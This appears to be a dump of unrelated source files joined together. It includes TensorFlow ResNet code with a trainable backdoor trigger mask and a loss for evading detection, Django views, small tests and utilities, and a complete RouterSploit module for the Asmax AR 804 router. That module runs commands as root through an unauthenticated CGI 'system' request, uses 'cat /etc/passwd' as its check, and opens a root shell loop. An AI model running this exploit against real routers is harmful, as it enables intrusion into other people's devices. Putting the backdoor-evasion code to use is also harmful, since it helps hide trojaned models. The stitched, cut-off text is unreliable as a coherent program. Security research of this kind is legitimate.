res4b19_relu = tf.nn.relu(res4b19, name='res4b19_relu')
res4b20_branch2a = self.convolution(res4b19_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b20_branch2a')
bn4b20_branch2a = self.batch_normalization(res4b20_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b20_branch2a')
res4b20_branch2a_relu = tf.nn.relu(bn4b20_branch2a, name='res4b20_branch2a_relu')
res4b20_branch2b_pad = tf.pad(res4b20_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b20_branch2b = self.convolution(res4b20_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b20_branch2b')
bn4b20_branch2b = self.batch_normalization(res4b20_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b20_branch2b')
res4b20_branch2b_relu = tf.nn.relu(bn4b20_branch2b, name='res4b20_branch2b_relu')
res4b20_branch2c = self.convolution(res4b20_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b20_branch2c')
bn4b20_branch2c = self.batch_normalization(res4b20_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b20_branch2c')
res4b20 = res4b19_relu + bn4b20_branch2c
res4b20_relu = tf.nn.relu(res4b20, name='res4b20_relu')
res4b21_branch2a = self.convolution(res4b20_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b21_branch2a')
bn4b21_branch2a = self.batch_normalization(res4b21_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b21_branch2a')
res4b21_branch2a_relu = tf.nn.relu(bn4b21_branch2a, name='res4b21_branch2a_relu')
res4b21_branch2b_pad = tf.pad(res4b21_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b21_branch2b = self.convolution(res4b21_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b21_branch2b')
bn4b21_branch2b = self.batch_normalization(res4b21_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b21_branch2b')
res4b21_branch2b_relu = tf.nn.relu(bn4b21_branch2b, name='res4b21_branch2b_relu')
res4b21_branch2c = self.convolution(res4b21_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b21_branch2c')
bn4b21_branch2c = self.batch_normalization(res4b21_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b21_branch2c')
res4b21 = res4b20_relu + bn4b21_branch2c
res4b21_relu = tf.nn.relu(res4b21, name='res4b21_relu')
res4b22_branch2a = self.convolution(res4b21_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b22_branch2a')
bn4b22_branch2a = self.batch_normalization(res4b22_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b22_branch2a')
res4b22_branch2a_relu = tf.nn.relu(bn4b22_branch2a, name='res4b22_branch2a_relu')
res4b22_branch2b_pad = tf.pad(res4b22_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b22_branch2b = self.convolution(res4b22_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b22_branch2b')
bn4b22_branch2b = self.batch_normalization(res4b22_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b22_branch2b')
res4b22_branch2b_relu = tf.nn.relu(bn4b22_branch2b, name='res4b22_branch2b_relu')
res4b22_branch2c = self.convolution(res4b22_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b22_branch2c')
bn4b22_branch2c = self.batch_normalization(res4b22_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b22_branch2c')
res4b22 = res4b21_relu + bn4b22_branch2c
res4b22_relu = tf.nn.relu(res4b22, name='res4b22_relu')
res5a_branch2a = self.convolution(res4b22_relu, group=1, strides=[2, 2], padding='VALID', name='res5a_branch2a')
res5a_branch1 = self.convolution(res4b22_relu, group=1, strides=[2, 2], padding='VALID', name='res5a_branch1')
bn5a_branch2a = self.batch_normalization(res5a_branch2a, variance_epsilon=9.99999974738e-06,
name='bn5a_branch2a')
bn5a_branch1 = self.batch_normalization(res5a_branch1, variance_epsilon=9.99999974738e-06, name='bn5a_branch1')
res5a_branch2a_relu = tf.nn.relu(bn5a_branch2a, name='res5a_branch2a_relu')
res5a_branch2b_pad = tf.pad(res5a_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res5a_branch2b = self.convolution(res5a_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res5a_branch2b')
bn5a_branch2b = self.batch_normalization(res5a_branch2b, variance_epsilon=9.99999974738e-06,
name='bn5a_branch2b')
res5a_branch2b_relu = tf.nn.relu(bn5a_branch2b, name='res5a_branch2b_relu')
res5a_branch2c = self.convolution(res5a_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res5a_branch2c')
bn5a_branch2c = self.batch_normalization(res5a_branch2c, variance_epsilon=9.99999974738e-06,
name='bn5a_branch2c')
res5a = bn5a_branch1 + bn5a_branch2c
res5a_relu = tf.nn.relu(res5a, name='res5a_relu')
res5b_branch2a = self.convolution(res5a_relu, group=1, strides=[1, 1], padding='VALID', name='res5b_branch2a')
bn5b_branch2a = self.batch_normalization(res5b_branch2a, variance_epsilon=9.99999974738e-06,
name='bn5b_branch2a')
res5b_branch2a_relu = tf.nn.relu(bn5b_branch2a, name='res5b_branch2a_relu')
res5b_branch2b_pad = tf.pad(res5b_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res5b_branch2b = self.convolution(res5b_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res5b_branch2b')
bn5b_branch2b = self.batch_normalization(res5b_branch2b, variance_epsilon=9.99999974738e-06,
name='bn5b_branch2b')
res5b_branch2b_relu = tf.nn.relu(bn5b_branch2b, name='res5b_branch2b_relu')
res5b_branch2c = self.convolution(res5b_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res5b_branch2c')
bn5b_branch2c = self.batch_normalization(res5b_branch2c, variance_epsilon=9.99999974738e-06,
name='bn5b_branch2c')
res5b = res5a_relu + bn5b_branch2c
res5b_relu = tf.nn.relu(res5b, name='res5b_relu')
res5c_branch2a = self.convolution(res5b_relu, group=1, strides=[1, 1], padding='VALID', name='res5c_branch2a')
bn5c_branch2a = self.batch_normalization(res5c_branch2a, variance_epsilon=9.99999974738e-06,
name='bn5c_branch2a')
res5c_branch2a_relu = tf.nn.relu(bn5c_branch2a, name='res5c_branch2a_relu')
res5c_branch2b_pad = tf.pad(res5c_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res5c_branch2b = self.convolution(res5c_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res5c_branch2b')
bn5c_branch2b = self.batch_normalization(res5c_branch2b, variance_epsilon=9.99999974738e-06,
name='bn5c_branch2b')
res5c_branch2b_relu = tf.nn.relu(bn5c_branch2b, name='res5c_branch2b_relu')
res5c_branch2c = self.convolution(res5c_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res5c_branch2c')
bn5c_branch2c = self.batch_normalization(res5c_branch2c, variance_epsilon=9.99999974738e-06,
name='bn5c_branch2c')
res5c = res5b_relu + bn5c_branch2c
res5c_relu = tf.nn.relu(res5c, name='res5c_relu')
feature_0 = tf.contrib.layers.flatten(res5c_relu)
with tf.variable_scope('feature') as scope:
wts = self._variable_with_constant_value('weight', self.__weights_dict['feature_1']['weights'])
bis = self._variable_with_constant_value('bias', self.__weights_dict['feature_1']['bias'])
feature_1 = tf.add(tf.matmul(feature_0, wts), bis)
cnn.top_layer = feature_1
cnn.top_size = int(bis.shape[-1])
cnn.dropout()
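    # Trainable trigger layer: learns a single-channel soft mask (tanh squashed
    # into [0, 1]) plus a full-depth pattern tensor, and blends them into the
    # current top layer as (1 - mask) * input + mask * pattern.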
def _backdoor_mask(self, cnn):
with tf.variable_scope('input_mask') as scope:
in_shape = cnn.top_layer.shape
shape = np.zeros(4, dtype=np.int32)
shape[0] = 1
shape[1] = int(in_shape[1])
shape[2] = int(in_shape[2])
shape[3] = 1
mask_param = tf.get_variable('mask_param', shape, dtype=tf.float32, initializer=tf.random_normal_initializer(),
trainable=self.trainable)
mask = (tf.tanh(mask_param) + 1.) / 2.
shape[3] = int(in_shape[3])
pattern_param = tf.get_variable('pattern_param', shape, dtype=tf.float32,
initializer=tf.glorot_normal_initializer(), trainable=self.trainable)
pattern = tf.tanh(pattern_param)
masked_input = (1 - mask) * cnn.top_layer + mask * pattern
if self.options.build_level == 'mask_only':
cnn.top_layer = pattern
cnn.aux_top_layer = mask
else:
cnn.top_layer = masked_input
cnn.aux_top_layer = mask
def skip_final_affine_layer(self):
return True
def add_inference(self, cnn):
if 'backdoor' in self.options.net_mode:
self.trainable = cnn.phase_train and (self.options.fix_level != 'all') \
and ('mask' not in self.options.fix_level)
cnn.trainable = self.trainable
self._backdoor_mask(cnn)
if self.options.build_level == 'mask_only':
return cnn.top_layer
self.trainable = cnn.phase_train and (self.options.fix_level != 'all') \
and ('bottom' not in self.options.fix_level)
cnn.trainable = self.trainable
if self.model_name == 'resnet101':
self._resnet101_inference(cnn)
elif self.model_name == 'vgg16':
self._vgg16_inference(cnn)
elif self.model_name == 'googlenet':
self._googlenet_inference(cnn)
elif self.model_name == 'gtsrb':
self._gtsrb_inference(cnn)
elif self.model_name == 'cifar10':
self._resnet20.add_inference(cnn)
elif self.model_name == 'cifar10_alexnet':
self._alexnet.add_inference(cnn)
elif self.model_name == 'resnet50':
self._resnet50.add_inference(cnn)
elif self.model_name == 'benchmark_resnet101':
self._resnet101.add_inference(cnn)
cnn.affine(256, activation='linear')
if self.options.net_mode == 'triple_loss' or 'discriminator' in self.options.net_mode:
cnn.aux_top_layer = cnn.top_layer
cnn.aux_top_size = cnn.top_size
if self.options.build_level == 'logits':
self.trainable = cnn.phase_train and (self.options.fix_level != 'all') \
and ('affine' not in self.options.fix_level)
cnn.trainable = self.trainable
name = ('fc%d_1' % self.num_class)
initializers = None
            # NOTE: hasattr(self, '__weights_dict') can never be true because of
            # name mangling (the attribute is stored as _<Class>__weights_dict),
            # so probe the mangled name instead; this assumes the dict is set on
            # this class itself rather than on a subclass.
            if hasattr(self, '_%s__weights_dict' % type(self).__name__) and (name in self.__weights_dict):
print('===Debug===Hi, I found it ' + name)
initializers = []
initializers.append(tf.constant_initializer(self.__weights_dict[name]['weights']))
initializers.append(tf.constant_initializer(self.__weights_dict[name]['bias']))
cnn.affine(self.num_class, activation='linear', initializers=initializers)
self.last_affine_name = 'affine' + str(cnn.counts['affine']-1)
if 'discriminator' in self.options.net_mode:
self.trainable = cnn.phase_train and (self.options.fix_level != 'all') \
and ('discriminator' not in self.options.fix_level)
cnn.trainable = self.trainable
with tf.variable_scope('discriminator') as scope:
with cnn.switch_to_aux_top_layer():
cnn.affine(256)
cnn.affine(128)
cnn.affine(2, activation='linear')
return cnn.top_layer
def build_network(self,
inputs,
phase_train=True,
nclass=1001):
images = inputs[0]
if self.data_format == 'NCHW':
images = tf.transpose(images, [0, 3, 1, 2])
var_type = tf.float32
if self.data_type == tf.float16 and self.fp16_vars:
var_type = tf.float16
network = convnet_builder.ConvNetBuilder(
images, self.depth, phase_train, self.use_tf_layers, self.data_format,
self.data_type, var_type)
with tf.variable_scope('cg', custom_getter=network.get_custom_getter()):
self.add_inference(network)
logits = network.top_layer
aux_logits = network.aux_top_layer
# Add the final fully-connected class layer
#if not self.skip_final_affine_layer():
# logits = network.affine(nclass, activation='linear')
# aux_logits = None
# if network.aux_top_layer is not None:
# with network.switch_to_aux_top_layer():
# aux_logits = network.affine(nclass, activation='linear', stddev=0.001)
if self.data_type == tf.float16:
# TODO(reedwm): Determine if we should do this cast here.
logits = tf.cast(logits, tf.float32)
if aux_logits is not None:
aux_logits = tf.cast(aux_logits, tf.float32)
return model_lib.BuildNetworkResult(
logits=logits, extra_info=None if aux_logits is None else aux_logits)
def get_learning_rate(self, global_step, batch_size):
if self.options.data_mode == 'poison' or self.options.load_mode != 'normal':
return self.options.base_lr
if hasattr(self,'_resnet50'):
return self._resnet50.get_learning_rate(global_step, batch_size)
elif hasattr(self,'_resnet101'):
return self._resnet101.get_learning_rate(global_step, batch_size)
elif hasattr(self,'_resnet20'):
return self._resnet20.get_learning_rate(global_step, batch_size)
elif hasattr(self,'_alexnet'):
return self._alexnet.get_learning_rate(global_step, batch_size)
return self.options.base_lr
def batch_normalization(self, input, name, **kwargs):
with tf.variable_scope(name):
# moving_mean & moving_variance
mean = self._variable_with_constant_value('mean', self.__weights_dict[name]['mean'], False)
variance = self._variable_with_constant_value('var', self.__weights_dict[name]['var'], False)
offset = self._variable_with_constant_value('bias', self.__weights_dict[name]['bias']) \
if 'bias' in self.__weights_dict[name] else None
scale = self._variable_with_constant_value('scale', self.__weights_dict[name]['scale']) \
if 'scale' in self.__weights_dict[name] else None
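            # NOTE: the frozen (not trainable) branch below still normalizes with
            # batch statistics (is_training=True) and refreshes the moving
            # averages, while the trainable branch reuses the stored statistics;
            # this inversion looks deliberate for the backdoor analysis here, but
            # is worth double-checking. Note also that the variance_epsilon the
            # callers pass is swallowed by **kwargs; epsilon is hardcoded to
            # 1e-5 below (numerically the same value).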
if not self.trainable:
decay = 0.999
bn, batch_mean, batch_variance = tf.nn.fused_batch_norm(input, scale=scale, offset=offset,
name=name, is_training=True, epsilon=1e-5)
mean_update = moving_averages.assign_moving_average(mean, batch_mean, decay=decay, zero_debias=False)
variance_update = moving_averages.assign_moving_average(variance, batch_variance, decay=decay,
zero_debias=False)
tf.add_to_collection(tf.GraphKeys.UPDATE_OPS, mean_update)
tf.add_to_collection(tf.GraphKeys.UPDATE_OPS, variance_update)
else:
bn, _, _ = tf.nn.fused_batch_norm(input, scale=scale, offset=offset, mean=mean, variance=variance,
name=name, is_training=False, epsilon=1e-5)
return bn
def convolution(self, input, name, group, strides, padding):
with tf.variable_scope(name):
w = self._variable_with_constant_value('weight', self.__weights_dict[name]['weights'])
strides = [1] + strides + [1]
layer = tf.nn.conv2d(input, w, strides=strides, padding=padding)
if 'bias' in self.__weights_dict[name]:
b = self._variable_with_constant_value('bias', self.__weights_dict[name]['bias'])
layer = tf.nn.bias_add(layer, b)
return layer
def _classification_loss(self, logits, aux_logits, labels):
with tf.name_scope('xentropy'):
cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=logits, labels=labels)
loss = tf.reduce_mean(cross_entropy, name='xentropy_mean')
if aux_logits is not None:
with tf.name_scope('aux_xentropy'):
aux_cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=aux_logits, labels=labels)
aux_loss = 0.4 * tf.reduce_mean(aux_cross_entropy, name='aux_loss')
loss = tf.add_n([loss, aux_loss])
return loss
def _discriminator_loss(self, logits, aux_logits, labels, poison_lbs):
with tf.name_scope('discriminator_xentropy'):
cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=aux_logits, labels=poison_lbs)
loss = tf.reduce_mean(cross_entropy, name='discriminator_mean')
return loss
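        # NOTE: the early return above makes everything below in this method
        # unreachable; it reads like an older revision of this loss that was
        # kept verbatim.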
if ('defence' in self.options.net_mode):
with tf.name_scope('discriminator_xentropy'):
cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=aux_logits, labels=poison_lbs)
loss = tf.reduce_mean(cross_entropy, name='discriminator_mean')
else:
with tf.name_scope('xentropy'):
cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=logits, labels=labels)
loss = tf.reduce_mean(cross_entropy, name='xentropy_mean')
if aux_logits is not None:
with tf.name_scope('discriminator_xentropy'):
aux_cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=aux_logits, labels=poison_lbs)
aux_loss = -1.0 * tf.reduce_mean(aux_cross_entropy, name='discriminator_mean')
loss = tf.add_n([loss, aux_loss])
return loss
def _triple_loss(self, logits, aux_logits, labels):
splited_labels = tf.unstack(labels, axis=1)
lambda_a = splited_labels[2]
lambda_b = 1 - lambda_a
with tf.name_scope('xentropy'):
a_cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=logits, labels=tf.to_int32(splited_labels[0]), weights=lambda_a)
b_cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=logits, labels=tf.to_int32(splited_labels[1]), weights=lambda_b)
loss = tf.reduce_mean(a_cross_entropy + b_cross_entropy, name='xentropy_mean')
if aux_logits is not None:
ct_lambda = tf.concat([tf.expand_dims(lambda_a, 1), tf.expand_dims(lambda_b, 1)], axis=1)
splited_lambda = tf.split(ct_lambda, self.options.num_slices_one_batch, axis=0)
splited_aux_logits = tf.split(aux_logits, self.options.num_slices_one_batch, axis=0)
with tf.name_scope('aux_triplet'):
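                # Per slice: squared cosine similarity between every pair of
                # embeddings, then a quadratic penalty expanded from
                # (cos - lambda)^2 = cos^2 - 2*cos*lambda + lambda^2 against
                # the mixing weights.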
for _ct_lambda, _aux_logits in zip(splited_lambda, splited_aux_logits):
cross = tf.matmul(_aux_logits, tf.transpose(_aux_logits))
square_norm = tf.diag_part(cross)
square_cross = tf.square(cross)
square_cos = tf.divide(square_cross, tf.expand_dims(square_norm, 1))
square_cos = tf.divide(square_cos, tf.expand_dims(square_norm, 0))
unstacked_sq_cos = tf.unstack(square_cos, axis=0)
sq_cos_a = tf.expand_dims(unstacked_sq_cos[0], 1)
sq_cos_b = tf.expand_dims(unstacked_sq_cos[-1], 1)
ct_sq_cos = tf.concat(axis=1, values=[sq_cos_a, sq_cos_b])
ct_cos = tf.sqrt(ct_sq_cos)
triplet_loss = ct_sq_cos - 2.0 * ct_cos * _ct_lambda + tf.square(_ct_lambda)
aux_loss = tf.reduce_mean(triplet_loss, name='aux_loss')
loss = tf.add_n([loss, aux_loss])
return loss
def _backdoor_defence_loss(self, logits, aux_logits, labels):
with tf.name_scope('xentropy'):
cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=logits, labels=labels)
loss = tf.reduce_mean(cross_entropy, name='xentropy_mean')
with tf.name_scope('aux_l1norm'):
abs_logits = tf.abs(aux_logits)
abs_sum = tf.reduce_sum(abs_logits, [1, 2, 3])
# aux_l1_norm = tf.losses.absolute_difference(labels=labels,predictions=abs_sum)
aux_loss = self.options.loss_lambda * tf.reduce_mean(abs_sum, name='aux_loss')
loss = tf.add_n([loss, aux_loss])
return loss
def _backdoor_evade_loss(self, embeddings, mask, labels):
with tf.name_scope('xentropy'):
splited_embeddings = tf.split(embeddings, self.options.batch_size, axis=0)
xSxs = []
mu = tf.constant(self.mu)
inv_Sigma = tf.constant(self.inv_Sigma)
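            # Per-sample Mahalanobis distance (x - mu)^T Sigma^{-1} (x - mu) of
            # each embedding against the stored Gaussian statistics.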
for em in splited_embeddings:
x = em-mu
xS = tf.matmul(x, inv_Sigma)
xSx = tf.matmul(xS, tf.transpose(x))
xSxs.append(xSx)
loss = tf.reduce_mean(xSxs, name='xentropy_mean')
with tf.name_scope('aux_l1norm'):
abs_logits = tf.abs(mask)
abs_sum = tf.reduce_sum(abs_logits, [1, 2, 3])
# aux_l1_norm = tf.losses.absolute_difference(labels=labels,predictions=abs_sum)
aux_loss = self.options.loss_lambda * tf.reduce_mean(abs_sum, name='aux_loss')
loss = tf.add_n([loss, aux_loss])
return loss
    def loss_function(self, inputs, build_network_result):
        """Loss function."""
        logits = build_network_result.logits
        aux_logits = build_network_result.extra_info
        labels = inputs[1]
        loss = None
if self.options.net_mode == 'normal':
loss = self._classification_loss(logits, aux_logits, labels)
elif self.options.net_mode == 'triple_loss':
loss = self._triple_loss(logits, aux_logits, labels)
elif self.options.net_mode == 'backdoor_def':
loss = self._backdoor_defence_loss(logits, aux_logits, labels)
elif self.options.net_mode == 'backdoor_eva':
loss = self._backdoor_evade_loss(logits,aux_logits,labels)
elif 'discriminator' in self.options.net_mode:
loss = self._discriminator_loss(logits,aux_logits,labels, inputs[2])
return loss
def _collect_backbone_vars(self):
bottom_vars = {}
last_affine_vars = {}
mask_vars = {}
other_vars = {}
mome_vars = {}
adam_vars = {}
discriminator_vars = {}
all_vars = tf.global_variables()
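        # Group variables by name; the first path component (the tower prefix,
        # e.g. v0/v1) appears to be normalized to v0 so that checkpoints map
        # onto a single replica.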
for v in all_vars:
vname = v.name.split(':')[0]
            if not vname.startswith('v'):
other_vars[vname] = v
continue
sv = vname.split('/')
sv[0] = 'v0'
vname = '/'.join(sv)
if 'Adam' in vname:
adam_vars[vname] = v
elif 'Momentum' in vname:
mome_vars[vname]= v
elif self.last_affine_name is not None and self.last_affine_name in vname:
last_affine_vars[vname] = v
elif 'input_mask' in vname:
mask_vars[vname] = v
elif 'discriminator' in vname:
discriminator_vars[vname] = v
else:
bottom_vars[vname] = v
li = []
load_mode = self.options.load_mode
if load_mode == 'all' or 'mask' in load_mode:
li.append(mask_vars)
if load_mode == 'all' or 'bottom' in load_mode:
li.append(bottom_vars)
if load_mode == 'all' or 'discriminator' in load_mode:
li.append(discriminator_vars)
if load_mode == 'all' or 'affine' in load_mode:
li.append(last_affine_vars)
var_list = {}
for a in li:
var_list = {**var_list, **a}
return var_list
def add_backbone_saver(self):
        # Create saver with a mapping from variable names in the backbone
        # checkpoint to variables in this model
print('===Load===')
        print('add backbone saver: ' + self.options.load_mode)
backbone_var_list = self._collect_backbone_vars()
self.backbone_savers.append(tf.train.Saver(backbone_var_list))
def load_backbone_model(self, sess, backbone_model_path):
print('===Load===')
for saver in self.backbone_savers:
print('load backbone model from: '+backbone_model_path)
saver.restore(sess, backbone_model_path)
def get_input_shapes(self, subset):
        if 'discriminator' in self.options.net_mode:
            return [[self.batch_size, self.image_size, self.image_size, self.depth],
                    [self.batch_size], [self.batch_size]]
        return [[self.batch_size, self.image_size, self.image_size, self.depth],
                [self.batch_size]]
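# Illustrative driver for the model class above (sketch only; `Model`,
# `options` and `inputs` are placeholders, since the real class name and
# option plumbing live outside this excerpt):
#
#   model = Model(options)
#   result = model.build_network(inputs, phase_train=True, nclass=1001)
#   loss = model.loss_function(inputs, result)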
BestStore/master/views.py | rishabh-22/ECommerce | 0 | 6616774 | from django.http import HttpResponseRedirect
from django.shortcuts import render, redirect
from django.views.generic import FormView
from django.views.generic.base import View
from master.forms import ContactQueryForm
from .models import ContactQuery
def home(request):
return render(request, "master/homepage.html")
def register(request):
return render(request, "master/register.html")
def login(request):
return render(request, "master/login.html")
def render_login_form(request):
return render(request, 'master/login.html')
# def contact_us(request):
# return render(request, 'contact_us.html')
#
#
# class ContactQuery(FormView):
#
# form_class = ContactQueryForm
# template_name = 'contact_us.html'
#
# def form_valid(self, form):
# form.save()
# # return render(request, 'contact_us.html', 'form': form)
#
# def form_invalid(self, form):
# return render(self.request, self.template_name, {'form': form, 'error': form.errors})
# class ContactView(View):
#
# def get(self, request):
# form = ContactQueryForm()
# context = {'form': form}
# return render(request, 'contact_us.html', context)
#
# def post(self, request):
# form = ContactQueryForm(request.POST)
# if form.is_valid():
# form.save()
# form = ContactQueryForm()
# return render(request, 'contact_us.html', {'form': form})
# return render(request, 'contact_us.html', {'form': form})
#
def contact_us(request):
form = ContactQueryForm()
if request.method == 'POST':
form = ContactQueryForm(request.POST)
if form.is_valid():
# import pdb;pdb.set_trace()
form.save()
return HttpResponseRedirect('/contact/')
else:
form = ContactQueryForm()
return render(request, 'contact_us.html', {'form': form})
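# A minimal urls.py wiring for these views might look like the sketch below;
# the route paths and names are assumptions, not taken from this repo:
#
#   from django.urls import path
#   from master import views
#
#   urlpatterns = [
#       path('', views.home, name='home'),
#       path('contact/', views.contact_us, name='contact'),
#   ]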
pystiche/data/__init__.py | dooglewoogle/pystiche | 129 | 6616775 | from .collections import *
from .datasets import *
from .license import *
tests/conftest.py | MapleCCC/importall | 0 | 6616776 | import os
import sys
import pytest
from .utils import mock_dict
@pytest.fixture
def mock_environment(request):
"""
Before the test runs, backup the environment.
After the test runs, restore the environment.
"""
# Reference: test.support.CleanImport() function implementation
# https://github.com/python/cpython/blob/v3.9.0/Lib/test/support/__init__.py#L1241
f_globals = request.function.__globals__
with mock_dict(f_globals, sys.modules, os.environ):
yield
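# Example test using the fixture (illustrative sketch; any change the test
# makes to sys.modules or os.environ is rolled back by mock_dict):
#
#   def test_env_is_isolated(mock_environment):
#       os.environ["SCRATCH_VAR"] = "1"    # discarded after the test
#       sys.modules.pop("json", None)      # restored after the test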
remake_index.py | jwansek/stagit-2 | 0 | 6616777 | import subprocess
import os
initdir = os.path.join("/", "home", "git", "git")
remote_git = os.path.join("/", "media", "git")
with open(os.path.join(initdir, "private_repos.txt"), "r") as f:
private_repos = f.read().split("\n")
dirs = []
for dir_ in os.listdir(initdir):
full_dir = os.path.join(initdir, dir_)
if os.path.isdir(full_dir) and str(full_dir).endswith(".git") and dir_ not in private_repos:
dirs.append(str(os.path.join(remote_git, dir_)))
cmd = "stagit-index %s > %s" % (" ".join(dirs), str(os.path.join(remote_git, "html", "index.html")))
#print(cmd)
subprocess.run(["ssh", "git@192.168.1.92", cmd])
print("Rebuilt HTML index...")
invert-binary-tree.py | Hemant-60/leetcode-solutions | 0 | 6616778 | ''' https://leetcode.com/problems/invert-binary-tree/ '''
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def invertTree(self, root: TreeNode) -> TreeNode:
        self.invert(root)
        return root
def invert(self,root: TreeNode):
        if root is None or (root.left is None and root.right is None):
            return
        root.left, root.right = root.right, root.left
self.invert(root.left)
self.invert(root.right)
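# Quick sanity check (sketch; uses the TreeNode constructor defined above):
#   root = TreeNode(1, left=TreeNode(2), right=TreeNode(3))
#   Solution().invertTree(root)
#   assert root.left.val == 3 and root.right.val == 2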
DIZED_APPS/INCANTATION/routersploit/modules/exploits/routers/asmax/ar_804_gu_rce.py | tanc7/ArmsCommander-TestBed | 1 | 6616779 | from routersploit import (
exploits,
print_success,
print_status,
print_error,
http_request,
mute,
validators,
shell
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Asmax AR 804 Remote Code Execution vulnerability.
If the target is vulnerable, command loop is invoked that allows executing commands with root privileges.
"""
__info__ = {
'name': 'Asmax AR 804 RCE',
'authors': [
'<NAME> <michal.sajdak[at]securitum.com>', # vulnerability discovery
'<NAME> <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'description': 'Module exploits Asmax AR 804 Remote Code Execution vulnerability which '
'allows executing command on operating system level with root privileges.',
'references': [
'http://www.securitum.pl/dh/asmax-ar-804-gu-compromise',
'https://www.exploit-db.com/exploits/8846/',
],
'devices': [
'Asmax AR 804 gu',
],
}
target = exploits.Option('', 'Target URL address e.g. http://192.168.1.1', validators=validators.url) # target url address
port = exploits.Option(80, 'Target HTTP port', validators=validators.integer) # target http port
def run(self):
print_status("Checking if target is vulnerable")
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
shell(self, architecture="mipsbe")
else:
print_error("Exploit failed - target seems to be not vulnerable")
def execute(self, cmd):
""" callback used by shell functionality """
url = "{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd)
response = http_request(method="GET", url=url)
if response is None:
return ""
return response.text
@mute
def check(self):
cmd = "cat /etc/passwd"
url = "{}:{}/cgi-bin/script?system%20{}".format(self.target, self.port, cmd)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if response.status_code == 200 and "root:" in response.text:
return True # target is vulnerable
return False # target is not vulnerable
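# Typical RouterSploit-style console session for this module (illustrative;
# the module path simply mirrors this file's location in the tree):
#   rsf > use exploits/routers/asmax/ar_804_gu_rce
#   rsf (Asmax AR 804 RCE) > set target http://192.168.1.1
#   rsf (Asmax AR 804 RCE) > run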
tests/test_backend.py | hwipl/nuqql-based | 0 | 6616780 | """
Backend testing code
"""
import subprocess
import unittest
import tempfile
import shutil
import socket
import time
from pathlib import Path
from typing import Any, Optional
from nuqql_based.main import VERSION
from nuqql_based.message import Message
# default socket timeout
DEFAULT_TIMEOUT = 10
class BackendTest(unittest.TestCase):
"""
Common backend test base class
"""
# test run counter
test_run = 0
def setUp(self) -> None:
# increase test run counter
self.__class__.test_run += 1
# create temporary directory
self.test_dir = tempfile.mkdtemp()
# start backend as subprocess
self.path = Path(__file__).resolve().parents[1]
self.backend_cmd = ""
self._set_backend_cmd()
self.proc: Optional[subprocess.Popen] = None
self.proc = subprocess.Popen(self.backend_cmd, shell=True,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
# client connection
self.buf = ""
self.sock: Optional[socket.socket] = None
self._set_socket()
self.set_timeout(DEFAULT_TIMEOUT)
self.server_addr: Any = None
self._set_server_addr()
self._connect()
def _set_backend_cmd(self) -> None:
"""
Set the backend command
"""
port = 32000 + self.test_run
self.backend_cmd = f"{self.path}/based.py --dir {self.test_dir} " \
f"--af inet --port {port}"
def _set_socket(self) -> None:
"""
Set the client socket
"""
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def _set_server_addr(self) -> None:
"""
Set the server address
"""
self.server_addr = ("localhost", 32000 + self.test_run)
def _connect(self) -> None:
"""
        Network connection helper, tries to reach the server for up to 50 seconds
"""
assert self.sock
tries = 0
while tries < 50:
try:
time.sleep(1)
self.sock.connect(self.server_addr)
break
except OSError:
tries += 1
def tearDown(self) -> None:
assert self.sock and self.proc
# close socket
self.sock.close()
self.sock = None
# close subprocess
self.proc.terminate()
self.proc.wait()
self.proc = None
# delete temporary directory
shutil.rmtree(self.test_dir)
def send_cmd(self, cmd: str) -> None:
"""
Send a command to the backend
"""
assert self.sock
cmd = f"{cmd}\r\n"
self.sock.sendall(cmd.encode())
def recv_msg(self) -> str:
"""
Receive a message from the backend
"""
assert self.sock
while self.buf.find("\r\n") == -1:
data = self.sock.recv(1024)
if not data:
return ""
self.buf += data.decode()
eom = self.buf.find("\r\n")
msg = self.buf[:eom]
self.buf = self.buf[eom + 2:]
return msg
def set_timeout(self, timeout: Optional[float]) -> None:
"""
Set socket timeout
